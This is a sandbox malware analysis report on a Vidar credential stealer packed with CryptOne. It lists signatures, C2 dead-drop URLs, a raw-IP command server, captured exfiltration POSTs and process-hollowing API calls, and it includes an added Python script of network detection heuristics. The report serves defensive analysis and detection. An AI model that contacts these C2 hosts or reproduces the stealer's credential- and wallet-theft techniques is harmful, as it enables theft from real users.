Windows Analysis Report
82xul16VKj.exe

Overview

General Information

Sample name: 82xul16VKj.exe
renamed because original name is a hash value
Original sample name: 07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
Analysis ID: 1466531
MD5: eb2f14b68aa11a4aea94985c87714811
SHA1: 2fa340debaa9fbe53ad934403d64a827ddde9445
SHA256: 07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957

Detection

CryptOne, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Installs new ROOT certificates
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

AV Detection

Source: 82xul16VKj.exe Avira: detected
Source: https://steamcommunity.com/profiles/76561199730044335 Avira URL Cloud: Label: malware
Source: https://t.me/bu77un Avira URL Cloud: Label: malware
Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199730044335", "https://t.me/bu77un"], "Botnet": "67fd81bf99f2a8aaa5bc79a1cfb25860"}
Source: survey-smiles.com Virustotal: Detection: 8%
Source: http://survey-smiles.com/R Virustotal: Detection: 12%
Source: http://survey-smiles.com/ Virustotal: Detection: 8%
Source: http://survey-smiles.com/z Virustotal: Detection: 10%
Source: 82xul16VKj.exe Virustotal: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 98.3% probability
Source: 82xul16VKj.exe Joe Sandbox ML: detected
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: I8S%
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: usernameField
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: a GX Stable
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: uctName
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: layVersion
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: sktop\
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: F783D5D3EF8C*
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: T=@?VDX;W:R1J )M$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: #5EG P%:{
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: ystemInfo
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: 304FDQ8L\h$
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: %hu/%hu
Source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack String decryptor: ero\wallet.k9ys
Source: 82xul16VKj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2B07.tmp, 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.2.dr
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\

Networking

Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199730044335
Source: Malware configuration extractor URLs: https://t.me/bu77un
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 116.202.180.70:5432
Source: global traffic HTTP traffic detected: GET /bu77un HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 199.59.243.226
Source: Joe Sandbox View IP Address: 149.154.167.99
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: tea.arpdabl.org | Content-Length: 4761 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: survey-smiles.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 116.202.180.70 (this line is repeated 50 times in the report)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JEVOW3XT.htm
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tea.arpdabl.org
Source: global traffic DNS traffic detected: DNS query: survey-smiles.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1 | Host: tea.arpdabl.org | Content-Length: 4761 | Connection: Keep-Alive | Cache-Control: no-cache
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: kat2B07.tmp, 00000002.00000003.356734139.0000000000946000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356820905.0000000000948000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.356654978.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.366603952.0000000000942000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.360869270.0000000000944000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.2.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/envx
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://survey-smiles.com/R
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://survey-smiles.com/z
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/)
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org/v
Source: kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.org5432Content-Disposition:
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tea.arpdabl.orgHJK
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70/2
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70/I
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432
Source: kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/2r
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/freebl3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/mozglue.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/msvcp140.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/nss3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/softokn3.dll%
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/softokn3.dllP
Source: kat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/sqlt.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432/vcruntime140.dll
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://116.202.180.70:5432Content-Disposition:
Source: BAEBGC.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BAEBGC.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAEBGC.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAEBGC.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: BAEBGC.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/bu77un
Source: 82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/bu77unguf_hMozilla/5.0
Source: kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: BAEBGC.2.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=net
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/search?q=wmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: kat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.dr String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161
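The requests in this section show the two halves of Vidar's network behaviour: a GET with no User-Agent to a dead-drop page (t.me/bu77un; the Steam profile URL is the other configured resolver), then traffic to the raw IP 116.202.180.70 on port 5432 that no DNS answer in the capture accounts for, fetches of the NSS and sqlite DLL set from that address, and a multipart/form-data POST to tea.arpdabl.org sent with a macOS Firefox User-Agent from a Windows host. The script below is an added example, not part of this report or of Vidar: it runs those heuristics over requests reconstructed from the report's request lines. The boundary regex, the port list, the User-Agent mismatch rule and the dead-drop page snippet are assumptions made here; the report does not show the resolver page body.

```python
"""Vidar-style network heuristics run over the requests captured in the report.

Added example, not part of the Joe Sandbox report or of Vidar itself. The sample
requests are reconstructed from the report's flattened request lines; the
boundary regex, port list and dead-drop page format are heuristics assumed here.
"""
import re
from dataclasses import dataclass

DEAD_DROP_HOSTS = {"steamcommunity.com", "t.me"}   # profile/channel pages used as C2 resolvers
# DLLs the report shows being fetched from the C2 (NSS/sqlite stack for browser credential decryption)
LOADER_DLLS = {"freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll",
               "softokn3.dll", "sqlt.dll", "vcruntime140.dll"}
# Observed boundary ----GHJEGCAEGIIIDHIEBKEB uses only letters A-K; the length range is an assumption
BOUNDARY_RE = re.compile(r"^----[A-K]{16,24}$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Assumed dead-drop format: an http(s)://IP[:port] string embedded in the page text
C2_IN_PAGE_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d{2,5})?")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Parse a raw HTTP/1.1 request head (CRLF-separated)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def check_request(req: HttpRequest, host_os: str = "Windows") -> list[str]:
    """Return the heuristics a single request trips."""
    findings = []
    host = req.headers.get("host", "")
    ua = req.headers.get("user-agent")
    if host in DEAD_DROP_HOSTS and ua is None:
        findings.append(f"dead-drop fetch without User-Agent: {host}{req.path}")
    if ua and host_os == "Windows" and "Macintosh" in ua:
        findings.append(f"User-Agent claims macOS from a Windows host: {host}")
    boundary = re.search(r"boundary=(\S+)", req.headers.get("content-type", ""))
    if req.method == "POST" and boundary and BOUNDARY_RE.match(boundary.group(1)):
        findings.append(f"multipart POST with Vidar-style boundary to {host}")
    if IPV4_RE.match(host.split(":")[0]) and req.path.lstrip("/").lower() in LOADER_DLLS:
        findings.append(f"loader DLL fetched from raw IP: {host}{req.path}")
    return findings


def check_flow(dst_ip: str, dport: int, dns_answers: set) -> list[str]:
    """Flag connections to IPs that never appeared in a DNS answer, on non-web ports."""
    if dst_ip not in dns_answers and dport not in (80, 443):
        return [f"direct-to-IP traffic with no DNS lookup: {dst_ip}:{dport}"]
    return []


def extract_c2_from_dead_drop(page_text: str) -> list[str]:
    """Pull IP:port C2 candidates out of a fetched profile/channel page (format assumed)."""
    return C2_IN_PAGE_RE.findall(page_text)


def analyze(raw_requests, flows, dns_answers) -> list[str]:
    findings = []
    for raw in raw_requests:
        findings += check_request(parse_request(raw))
    for dst_ip, dport in flows:
        findings += check_flow(dst_ip, dport, dns_answers)
    return findings


# Reconstructed from the report's request lines; the last GET is built from a URL the
# report only shows as a memory string, so it is constructed input.
SAMPLE_REQUESTS = [
    "GET /bu77un HTTP/1.1\r\nHost: t.me\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
    "POST / HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB\r\n"
    "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1\r\n"
    "Host: tea.arpdabl.org\r\nContent-Length: 4761\r\nConnection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1\r\n"
    "Host: survey-smiles.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /nss3.dll HTTP/1.1\r\nHost: 116.202.180.70:5432\r\n\r\n",
]
SAMPLE_FLOWS = [("116.202.180.70", 5432), ("149.154.167.99", 443)]
SAMPLE_DNS_ANSWERS = {"149.154.167.99"}  # t.me resolved; 116.202.180.70 was never queried
# Constructed stand-in for a dead-drop page; the report does not show the real page body.
SAMPLE_DEAD_DROP_PAGE = '<span class="actual_persona_name">https://116.202.180.70:5432|</span>'

if __name__ == "__main__":
    for finding in analyze(SAMPLE_REQUESTS, SAMPLE_FLOWS, SAMPLE_DNS_ANSWERS):
        print("[!]", finding)
    print("C2 candidates:", extract_c2_from_dead_drop(SAMPLE_DEAD_DROP_PAGE))
```

Run against the reconstructed traffic it reports six findings: the User-Agent-less dead-drop GET, the macOS User-Agent on both the POST and the survey-smiles.com GET, the Vidar-style boundary, the nss3.dll fetch from a raw IP, and the un-resolved flow to 116.202.180.70:5432. The User-Agent and boundary rules are the cheapest to deploy as proxy or IDS signatures; the DNS correlation needs a flow record source that keeps the resolver answers.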
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: C:\Users\user\Desktop\82xul16VKj.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEBEF0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 0_2_02EEBEF0
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEB250 NtCreateFile,CreateFileMappingA,CreateFileMappingA,MapViewOfFile,CloseHandle, 0_2_02EEB250
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEB510 NtProtectVirtualMemory,NtProtectVirtualMemory, 0_2_02EEB510
Source: C:\Users\user\Desktop\82xul16VKj.exe Code function: 0_2_02EEC510 0_2_02EEC510
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D744CF0 2_2_1D744CF0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D761C50 2_2_1D761C50
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D899CC0 2_2_1D899CC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73292D 2_2_1D73292D
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7312A8 2_2_1D7312A8
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732AA9 2_2_1D732AA9
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7E5940 2_2_1D7E5940
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D731C9E 2_2_1D731C9E
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D859A20 2_2_1D859A20
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D732018 2_2_1D732018
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D73D4C0 2_2_1D73D4C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D899430 2_2_1D899430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ED6D0 2_2_1D7ED6D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D9690 2_2_1D7D9690
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D749000 2_2_1D749000
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D855040 2_2_1D855040
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D733580 2_2_1D733580
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\kat2B07.tmp 6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
